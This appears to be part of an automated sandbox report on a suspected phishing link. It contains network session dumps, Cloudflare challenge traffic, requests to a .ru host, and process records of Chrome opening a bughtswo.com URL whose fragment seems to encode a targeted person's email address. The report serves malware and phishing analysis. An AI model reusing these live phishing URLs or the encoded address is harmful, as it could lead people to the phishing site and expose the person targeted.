                                                            Data Ascii: TXazHnGjrqmfGGlJxdM3rerc6BqKHA+sWBIY5xXZShaodqV5msASdb5IcqvnT56pxWYKTeImBkuiwO5Bgax7nrGWktLN9-GtQbFf1TbabtT-Vk6bXOliIzc8lIaGzbWrikxr9W97abibZLWRHsbz3j4PG6ZtlkTlwNbg+6MrEEIJbhen1-mberzrfaYWVONTxfskTRLT8BIxDJO8edu5BwePZ6NZVGIbfWSgoe6obfJkHfs4srkdOVtgpkCIGNu
                                                            2025-01-07 19:25:17 UTC1361INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:25:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4624
                                                            Connection: close
                                                            cf-chl-out: ZXTCj/FUNXUUMiv1j3Y9CmZHociydy81w9RdRZxA6PHMcdFAv+g+wizekb6xXILTqdSgZGc4S087OxPewrZ/f7GhTbGbhcfLwp+dLEhCVw==$M1iQrFLQcAFUtmFl
                                                            cf-chl-out-s: B+V0M0mz+tC6kSQ3qk1GpPJn6y64iBB+qTrIk0fBm4ZgX5FkDrTSaD58oiBY4cQ32PmZKcdvgyF3kRHR6v7Q5bromT8a1pWdeTuC/PbcGvJhN9Wy0hJmpMH7JmJOZIbjXVnUy4DjBgW/y/ovDb54593zVuiVEQCTU/7FoFFf+6+Cr44TzQIVmILV4/0UvExYBc3DGuqh6yfMNu4kT6l49Rx8fupKEhbxbdLRWCe3O7SIU+yAGcshR1GNvN25ltFNScD2u19v41fHM5ENn+EfRzJy5A9f2OJGf+h6VngzpLrzRmGV4SSNOUhKPylC6jJK+k7SEYSYlkzUB7dgONXcqdUPx1VaoM/Hz5UtgSvxp/860p9mPnDU564NyX+/vuzpDczSPEhCQxsI7kGSc6g34zBx3/dFjaipiQOerQGgDe/khbVNupJhE94xSpcRvEbwIEHXFTh9YxMlm8GarW7Hwf2PPDgoJxrsXbpbzng6ul50z921xA8TouEHWfwzxKBKhNhKZCko880uU+uCyGuQ6lBr/T6ES9PRFTgsBqlpNy+BqLfnLdX13/LUVCGH/wBy7Dju6kOLDJaxatoN4GEo1lYl8udfBb5HNTAV9EdcI234eB0PM0VfqCYWg/K/FPHFl+jADUs5vhMcJldsRaXalOpchNNbvulllkt58Z+PWy9ArF+NlTDPz43IF2QICgwVgeJ6O2tFJPXmorhFrL7bWMcI+82u5mEE9Caz2YFiXLVq5es09LefB8p3yRgLJpdp4ujsp2v7sKzGRhAx+VlbeSB6f5hYWO6Xoei08fOz0NPcpgiVlfXlLyjax4cQP2gNrqa020N1kKhGcrWSHJ24NduQD5qWQn1WcfUHaI5aYKCc/0fSbCPay7/+Wha53WYzH4MtiRDDXgA/dhAaT/yDNqP8zH+EXfxTL/fHt2dcR6b5kZVoV/C3FMXszxu6lkU/mLqvEtYLghUGSB1thA8P/aMPk6MHq96aFINEMFAsiro=$EOHU3 [TRUNCATED]
                                                            Server: cloudflare
                                                            CF-RAY: 8fe655379ec478e7-EWR
                                                            2025-01-07 19:25:17 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:25:17 UTC1345INData Raw: 66 57 4f 49 65 58 52 79 6d 57 70 6d 69 35 6c 73 62 48 47 51 58 49 2b 69 59 71 4a 34 68 4b 47 62 66 70 39 36 6a 48 74 74 61 70 4b 44 74 33 5a 34 69 4c 6d 4e 74 61 56 77 65 37 33 42 66 36 2b 30 78 59 4f 7a 74 72 36 65 78 37 58 4a 6f 61 69 6f 75 72 2b 67 30 64 43 6e 6c 4d 6e 51 72 4b 33 64 32 74 61 30 74 35 79 2f 33 4e 75 33 73 4b 62 68 76 38 53 6f 71 39 7a 73 7a 62 6e 75 78 2b 4f 6d 38 75 44 34 7a 73 6e 36 72 62 58 53 2b 72 58 72 76 38 6f 46 2b 38 48 78 77 66 6e 48 39 67 7a 73 33 66 59 43 42 38 76 49 37 67 50 4f 46 75 6f 52 31 50 44 6d 47 64 76 30 47 4f 38 42 31 50 51 52 49 4f 51 43 49 52 38 54 39 42 58 36 4a 51 38 61 2b 52 38 6d 41 78 59 72 4a 43 34 33 47 68 4d 39 4c 78 33 38 51 51 38 68 50 6a 6f 75 48 67 59 7a 4f 42 73 67 46 6a 78 49 4a 79 6c 4f 4a 69 49
                                                            Data Ascii: fWOIeXRymWpmi5lsbHGQXI+iYqJ4hKGbfp96jHttapKDt3Z4iLmNtaVwe73Bf6+0xYOztr6ex7XJoaiour+g0dCnlMnQrK3d2ta0t5y/3Nu3sKbhv8Soq9zszbnux+Om8uD4zsn6rbXS+rXrv8oF+8HxwfnH9gzs3fYCB8vI7gPOFuoR1PDmGdv0GO8B1PQRIOQCIR8T9BX6JQ8a+R8mAxYrJC43GhM9Lx38QQ8hPjouHgYzOBsgFjxIJylOJiI
                                                            2025-01-07 19:25:17 UTC1369INData Raw: 46 52 31 58 6d 70 2b 62 30 4a 63 53 57 52 67 62 30 36 4a 6a 57 74 6d 5a 34 68 36 6e 6d 39 71 65 5a 4f 5a 6e 6e 53 41 66 49 42 37 6e 49 4f 72 69 4b 79 6d 66 33 32 4f 65 34 70 39 70 58 2b 67 68 71 69 31 73 70 4f 5a 65 34 69 59 73 72 32 41 6d 4b 44 42 6e 4a 75 56 79 62 61 63 76 6f 71 48 6f 61 7a 46 72 4b 7a 48 30 5a 4b 79 79 73 6e 49 71 74 44 4a 6e 4b 2f 6a 33 73 57 74 31 38 66 62 78 4c 53 6d 35 73 50 48 7a 38 2f 4d 38 38 76 70 30 76 57 75 36 38 62 6f 39 73 7a 48 2f 75 6d 36 32 38 2f 50 41 64 58 32 39 66 66 69 31 2f 55 45 35 64 66 47 43 4f 50 65 32 2b 6e 6b 34 66 44 69 38 64 45 61 46 50 63 4f 43 68 7a 34 45 78 49 44 38 41 4d 57 41 41 63 61 35 75 6b 41 4c 77 6a 76 43 6a 51 42 2f 67 59 45 42 42 45 47 46 52 67 34 46 42 73 67 2b 68 6f 4d 50 78 45 63 2f 52 68 48
                                                            Data Ascii: FR1Xmp+b0JcSWRgb06JjWtmZ4h6nm9qeZOZnnSAfIB7nIOriKymf32Oe4p9pX+ghqi1spOZe4iYsr2AmKDBnJuVybacvoqHoazFrKzH0ZKyysnIqtDJnK/j3sWt18fbxLSm5sPHz8/M88vp0vWu68bo9szH/um628/PAdX29ffi1/UE5dfGCOPe2+nk4fDi8dEaFPcOChz4ExID8AMWAAca5ukALwjvCjQB/gYEBBEGFRg4FBsg+hoMPxEc/RhH
                                                            2025-01-07 19:25:17 UTC1369INData Raw: 74 63 67 59 56 78 56 46 35 6a 65 46 4b 4a 69 58 46 6e 6a 4b 42 67 55 32 70 63 70 57 35 78 6f 33 39 67 6e 58 68 6e 65 33 39 38 69 47 6c 2b 61 57 71 42 6a 58 61 49 68 4b 2b 4c 68 71 2b 39 6d 33 32 61 74 4c 4b 5a 6e 36 4b 51 6f 61 47 68 78 59 75 73 70 35 69 50 71 62 79 77 7a 61 32 78 30 72 6d 59 32 63 32 6c 71 36 65 75 7a 61 48 6a 6e 72 36 6c 76 37 37 6a 70 73 47 33 75 61 6a 72 38 4b 72 48 38 4b 36 7a 70 2f 54 54 74 74 44 44 78 4d 54 56 79 73 6a 4c 7a 4f 37 30 77 72 2f 31 39 50 6d 2f 35 63 45 48 31 77 72 4f 37 74 6e 2b 32 39 33 4c 46 4f 66 6a 79 2b 4d 4b 35 4e 50 31 31 51 6e 74 32 42 55 59 33 69 67 66 42 2f 59 64 2b 69 44 34 42 51 2f 72 2f 67 6f 4d 38 76 54 75 49 53 6e 32 45 44 59 56 42 68 51 32 38 76 63 79 4f 54 59 52 49 78 51 53 42 79 45 47 42 52 70 4f 47
                                                            Data Ascii: tcgYVxVF5jeFKJiXFnjKBgU2pcpW5xo39gnXhne398iGl+aWqBjXaIhK+Lhq+9m32atLKZn6KQoaGhxYusp5iPqbywza2x0rmY2c2lq6euzaHjnr6lv77jpsG3uajr8KrH8K6zp/TTttDDxMTVysjLzO70wr/19Pm/5cEH1wrO7tn+293LFOfjy+MK5NP11Qnt2BUY3igfB/Yd+iD4BQ/r/goM8vTuISn2EDYVBhQ28vcyOTYRIxQSByEGBRpOG
                                                            2025-01-07 19:25:17 UTC541INData Raw: 56 67 55 39 51 6d 46 64 63 64 4a 43 52 58 47 4a 62 62 6d 36 54 65 31 35 6b 64 6e 71 56 65 34 4f 70 65 34 6c 36 61 70 56 76 6f 71 32 5a 61 36 64 78 76 58 65 37 74 48 4a 36 64 49 75 63 6b 4d 53 61 79 61 44 4c 77 70 65 4d 70 37 69 51 70 39 43 71 7a 71 4c 43 7a 62 69 6d 73 71 62 45 6d 4a 53 65 73 71 36 35 30 4e 4b 65 34 70 37 47 73 64 69 6c 37 4d 58 61 76 38 32 75 34 4d 66 4e 70 38 79 75 77 4c 62 74 37 63 54 49 31 65 69 33 31 2f 36 36 7a 4c 36 38 30 38 61 37 2b 66 7a 36 77 2b 6b 4a 78 38 50 72 38 2b 2f 67 7a 50 50 77 39 2f 62 76 32 2f 55 67 48 74 33 73 2b 74 37 35 38 43 67 6d 41 41 48 68 39 2b 77 47 43 75 66 37 2f 50 34 49 38 51 77 6f 39 77 51 53 42 77 6b 47 46 6a 34 4d 47 67 30 65 50 77 38 65 4e 51 4d 64 46 53 4e 4b 4a 68 6b 62 4a 43 67 71 52 41 38 72 49 51
                                                            Data Ascii: VgU9QmFdcdJCRXGJbbm6Te15kdnqVe4Ope4l6apVvoq2Za6dxvXe7tHJ6dIuckMSayaDLwpeMp7iQp9CqzqLCzbimsqbEmJSesq650NKe4p7Gsdil7MXav82u4MfNp8yuwLbt7cTI1ei31/66zL6808a7+fz6w+kJx8Pr8+/gzPPw9/bv2/UgHt3s+t758CgmAAHh9+wGCuf7/P4I8Qwo9wQSBwkGFj4MGg0ePw8eNQMdFSNKJhkbJCgqRA8rIQ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.849746104.18.94.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:18 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B. HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:18 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Tue, 07 Jan 2025 19:25:18 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: RNwgH28kqFU+fANooXQqAqSISckGYbXuQHs=$0vROJe7wkyI9AAD0
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6553c8d4a728a-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:25:18 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.849748188.114.96.34435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:18 UTC673OUTGET /oekpuvcikmwdxxivfxvpcxozbUNRPoHVMCDXFUWIMURZTCUJGKPMNGCPMKEEADRFNIRBIVDJN HTTP/1.1
                                                            Host: co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://brh5.bughtswo.com
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:19 UTC906INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:25:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksFmMG8yX2iUFZq%2BiIvypeCZyPr9tw14g6kn0t%2BvZLDAWyNtWkCBDb69Ora%2FZMlulVZGduhkqvwlgwvxO1lOFiBN6ZHaMOQ8BqmVNNGsVmDQ9vXRHsvG%2BtG5RMXVlR1mKM8cYga0bW11ozWyUJnmZnsH%2FF1Vl%2B3giW1ZALciKL%2B6DcBn9V3lnriVZE%2FQMnSbMWNidd2%2FAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8fe655415e540f6c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1701&rtt_var=640&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1251&delivery_rate=1708601&cwnd=180&unsent_bytes=0&cid=9bde1936750810d5&ts=578&x=0"
                                                            2025-01-07 19:25:19 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                            Data Ascii: 11
                                                            2025-01-07 19:25:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.849751188.114.96.34435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:25:20 UTC465OUTGET /oekpuvcikmwdxxivfxvpcxozbUNRPoHVMCDXFUWIMURZTCUJGKPMNGCPMKEEADRFNIRBIVDJN HTTP/1.1
                                                            Host: co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:25:20 UTC898INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:25:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuBcEniQrkMU4lgxIlKjgwgq19LJ1uxpWJtbxNaN86k2BC6vq2VDAo6MIRrxGH7oXqU2Ew6PByrx%2FCsseG9oTK4qES3W0sbwj0X8OBYMQWT0rCiVP1eBPFOSSrYDcrWzx1LsQZM6Bp%2F24ca7wm6kk%2BPeVaIxj2a10y6Tv3R%2Bx1LWQFn%2B1DwWTDuz2RoDiFhMtgvN089OFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8fe65548a9ffc32d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1513&rtt_var=579&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1043&delivery_rate=1869398&cwnd=252&unsent_bytes=0&cid=d10a889103396e0d&ts=595&x=0"
                                                            2025-01-07 19:25:20 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                            Data Ascii: 11
                                                            2025-01-07 19:25:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:14:24:42
                                                            Start date:07/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                            Imagebase:0x7ff678760000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:14:24:46
                                                            Start date:07/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=2008,i,2198589469627918427,17231179817136135105,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                            Imagebase:0x7ff678760000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:3
                                                            Start time:14:24:53
                                                            Start date:07/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t"
                                                            Imagebase:0x7ff678760000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            No disassembly